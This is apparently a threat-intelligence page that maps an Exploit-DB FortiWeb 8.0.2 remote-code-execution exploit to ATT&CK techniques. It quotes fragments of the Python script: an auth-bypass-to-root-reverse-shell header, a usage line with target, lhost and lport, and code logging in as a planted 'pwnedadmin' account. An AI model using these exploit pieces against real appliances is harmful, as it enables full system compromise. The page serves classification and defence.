Exploit-DB
[webapps] FortiWeb 8.0.2 - Remote Code Execution
ATT&CK techniques detected
T1190 Exploit Public-Facing Application
97%
“( critical ) # category : webapps # platform : hardware / appliance ( linux - based ) # critical : true # including : authentication bypass + path traversal + arbitrary file upload → rce # impact : full system compromise, root reverse shell # fix : upgrade to fortiweb 7. 6. 7, 7.…”
T1190 Exploit Public-Facing Application
96%
“[ webapps ] fortiweb 8. 0. 2 - remote code execution fortiweb 8. 0. 2 - remote code execution # exploit title : fortiweb 8. 0. 2 - remote code execution # date : 2025 - 11 - 22 # author : mohammed idrees banyamer # author country : jordan # instagram : @ banyamer _ security # git…”
T1059.006 Python
74%
“banyamer _ security lab / authorized testing only " " " ) if len ( sys. argv )! = 4 : banner ( ) print ( " usage : python3 fortiweb _ rce. py < target > < lhost > < lport > " ) print ( " example : python3 fortiweb _ rce. py https : / / 192. 168. 100. 50 : 8443 192. 168. 45. 10 44…”
T1505.003 Web Shell
74%
“print ( " [ 2 ] logging in with new admin... " ) login = s. post ( f " { target } / api / v2. 0 / login ", json = { " username " : " pwnedadmin ", " password " : " pwned123! " }, timeout = 10 ) if " success " not in login. text : print ( " [ - ] login failed " ) return shell = f …”
Summary
FortiWeb 8.0.2 - Remote Code Execution